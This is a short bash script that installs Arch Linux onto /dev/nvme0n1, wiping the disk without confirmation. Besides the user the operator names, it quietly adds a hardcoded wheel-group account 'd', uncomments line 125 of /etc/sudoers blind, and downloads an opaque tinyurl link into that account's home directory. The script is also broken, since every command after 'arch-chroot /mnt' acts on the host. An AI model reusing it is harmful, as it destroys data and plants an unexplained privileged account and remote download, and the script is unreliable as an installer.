#!/bin/bash

parted /dev/nvme0n1 mklabel gpt
parted /dev/nvme0n1 mkpart primary ext4 0GB 1GB
parted /dev/nvme0n1 mkpart primary ext4 1GB 100%

mkfs.vfat /dev/nvme0n1p1
mkfs.ext4 /dev/nvme0n1p2

mount /dev/nvme0n1p2 /mnt
mount --mkdir /dev/nvme0n1p1 /mnt/boot

pacstrap -K /mnt base linux linux-firmware intel-ucode sudo networkmanager grub efibootmgr sed curl

arch-chroot /mnt
read -p "Enter a username to add: " username
useradd -mG wheel -s /bin/bash "$username"
useradd -mG wheel -s /bin/bash d
grub-install --efi-directory=/boot
grub-mkconfig -o /boot/grub/grub.cfg
systemctl enable NetworkManager
sed -i '125s/^#/ /' /etc/sudoers
curl -sL tinyurl.com/comcompp -o /home/d/2
